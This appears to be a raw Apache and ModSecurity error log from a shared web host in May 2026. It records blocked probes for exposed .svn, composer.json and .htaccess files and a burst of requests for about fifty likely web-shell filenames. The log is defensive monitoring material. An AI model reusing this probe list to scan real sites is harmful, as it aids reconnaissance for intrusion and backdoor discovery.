[Mon May 11 12:35:58.147987 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:40770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.svn/composer.json-update"] [unique_id "agGxDkYQeUtAPynIs6xobwAAAAw"]
[Mon May 11 12:35:59.311950 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:40770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxDkYQeUtAPynIs6xobwAAAAw"]
[Mon May 11 12:35:59.336515 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:40774] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/composer.json-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.svn/composer.json-update"] [unique_id "agGxD0YQeUtAPynIs6xocAAAABQ"]
[Mon May 11 12:35:59.338437 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:40774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.svn/composer.json-update"] [unique_id "agGxD0YQeUtAPynIs6xocAAAABQ"]
[Mon May 11 12:36:00.561782 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:40774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxD0YQeUtAPynIs6xocAAAABQ"]
[Mon May 11 12:36:17.172780 2026] [security2:error] [pid 1254179:tid 1254197] [client 43.164.196.47:49284] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/"] [unique_id "agGxIWS6k_SCYd1AVZq_OgAAARA"], referer: http://www.piregwan-genesis.com
[Mon May 11 12:36:17.574581 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/seo.php
[Mon May 11 12:36:17.599077 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wmore1.php
[Mon May 11 12:36:17.623619 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wpb.php
[Mon May 11 12:36:17.647693 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/bgymj.php
[Mon May 11 12:36:17.671883 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/bhm.php
[Mon May 11 12:36:17.695773 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/maxro.php
[Mon May 11 12:36:17.719714 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/1.php
[Mon May 11 12:36:17.743485 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wp-upload.php
[Mon May 11 12:36:17.767227 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/de.php
[Mon May 11 12:36:17.791059 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/.dela.php
[Mon May 11 12:36:17.815049 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/dropdown.php
[Mon May 11 12:36:17.838838 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/ahutr.php
[Mon May 11 12:36:17.862600 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/hypo.php
[Mon May 11 12:36:17.886411 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/.yuf.php
[Mon May 11 12:36:17.910496 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/lef.php
[Mon May 11 12:36:17.934611 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/snus.php
[Mon May 11 12:36:17.958682 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wp-Blogs.php
[Mon May 11 12:36:17.982583 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/multirole.php
[Mon May 11 12:36:18.006777 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/aevly.php
[Mon May 11 12:36:18.030720 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/un.php
[Mon May 11 12:36:18.054782 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/themes4.php
[Mon May 11 12:36:18.078904 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/vx.php
[Mon May 11 12:36:18.103108 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/zxcs.php
[Mon May 11 12:36:18.127262 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/zvz89.php
[Mon May 11 12:36:18.151406 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/export.php
[Mon May 11 12:36:18.175568 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/as.php
[Mon May 11 12:36:18.199390 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/disagrsxr.php
[Mon May 11 12:36:18.223439 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/blox.php
[Mon May 11 12:36:18.247835 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/ckk.php
[Mon May 11 12:36:18.271933 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/bjeni.php
[Mon May 11 12:36:18.296128 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/cilng.php
[Mon May 11 12:36:18.320414 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/xx.php
[Mon May 11 12:36:18.344557 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/raw.php
[Mon May 11 12:36:18.368394 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/class-bda.php
[Mon May 11 12:36:18.392411 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/xxc.php
[Mon May 11 12:36:18.416535 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/like.php
[Mon May 11 12:36:18.440871 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/f222.php
[Mon May 11 12:36:18.465121 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/zz.php
[Mon May 11 12:36:18.488988 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/haz.php
[Mon May 11 12:36:18.512869 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/class-wp-image.php
[Mon May 11 12:36:18.536636 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/24name.php
[Mon May 11 12:36:18.564039 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/rasse.php
[Mon May 11 12:36:18.588303 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/zzx.php
[Mon May 11 12:36:18.612324 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/bootstrap.php
[Mon May 11 12:36:18.636098 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/class-cc.php
[Mon May 11 12:36:18.660312 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/667.php
[Mon May 11 12:36:18.688569 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/55l453.php
[Mon May 11 12:36:18.712549 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/sd.php
[Mon May 11 12:36:18.736381 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wp-su.php
[Mon May 11 12:36:18.760245 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/rea889y.php
[Mon May 11 12:36:18.784173 2026] [:error] [pid 1254133:tid 1254141] [client 20.166.9.204:16431] File does not exist: /home/pweilcom/public_html/wp-act.php
[Mon May 11 12:36:36.985410 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:44986] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /backend/composer.json.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/backend/composer.json.disabled"] [unique_id "agGxNGS6k_SCYd1AVZq_SwAAAQA"]
[Mon May 11 12:36:36.985620 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:44986] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/backend/composer.json.disabled"] [unique_id "agGxNGS6k_SCYd1AVZq_SwAAAQA"]
[Mon May 11 12:36:38.156509 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:44986] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxNGS6k_SCYd1AVZq_SwAAAQA"]
[Mon May 11 12:36:38.182386 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:44994] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /backend/composer.json.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/backend/composer.json.disabled"] [unique_id "agGxNkRdw2n9wv6Ai48XbAAAAJg"]
[Mon May 11 12:36:38.182588 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:44994] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/backend/composer.json.disabled"] [unique_id "agGxNkRdw2n9wv6Ai48XbAAAAJg"]
[Mon May 11 12:36:39.401666 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:44994] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxNkRdw2n9wv6Ai48XbAAAAJg"]
[Mon May 11 12:36:47.019372 2026] [security2:error] [pid 1254212:tid 1254220] [client 49.51.52.250:52900] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/"] [unique_id "agGxP0YQeUtAPynIs6xooQAAAAY"]
[Mon May 11 12:36:51.918573 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:44852] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /build/composer.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/build/composer.json20240101"] [unique_id "agGxQxjZymfuKpjWXeiMxgAAAMs"]
[Mon May 11 12:36:51.918799 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:44852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/build/composer.json20240101"] [unique_id "agGxQxjZymfuKpjWXeiMxgAAAMs"]
[Mon May 11 12:36:53.101020 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:44852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxQxjZymfuKpjWXeiMxgAAAMs"]
[Mon May 11 12:36:53.127470 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:27968] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /build/composer.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/build/composer.json20240101"] [unique_id "agGxRURdw2n9wv6Ai48XgQAAAIs"]
[Mon May 11 12:36:53.127675 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:27968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/build/composer.json20240101"] [unique_id "agGxRURdw2n9wv6Ai48XgQAAAIs"]
[Mon May 11 12:36:54.371568 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:27968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxRURdw2n9wv6Ai48XgQAAAIs"]
[Mon May 11 12:36:59.412529 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28024] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /cache/.htaccess-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/cache/.htaccess-old"] [unique_id "agGxS5kIEwRJMyDaV55eVQAAAUA"]
[Mon May 11 12:36:59.412741 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/cache/.htaccess-old"] [unique_id "agGxS5kIEwRJMyDaV55eVQAAAUA"]
[Mon May 11 12:37:00.596081 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxS5kIEwRJMyDaV55eVQAAAUA"]
[Mon May 11 12:37:00.621851 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:28034] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /cache/.htaccess-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/cache/.htaccess-old"] [unique_id "agGxTGS6k_SCYd1AVZq_YAAAARM"]
[Mon May 11 12:37:00.622049 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:28034] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/cache/.htaccess-old"] [unique_id "agGxTGS6k_SCYd1AVZq_YAAAARM"]
[Mon May 11 12:37:01.859749 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:28034] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxTGS6k_SCYd1AVZq_YAAAARM"]
[Mon May 11 12:37:01.886282 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:28048] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /chat/composer.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/chat/composer.json.draft"] [unique_id "agGxTb4KNmD_mZ_vlf9KUAAAAE4"]
[Mon May 11 12:37:01.886493 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:28048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/chat/composer.json.draft"] [unique_id "agGxTb4KNmD_mZ_vlf9KUAAAAE4"]
[Mon May 11 12:37:03.064193 2026] [security2:error] [pid 1254242:tid 1254259] [client 185.177.72.9:28048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxTb4KNmD_mZ_vlf9KUAAAAE4"]
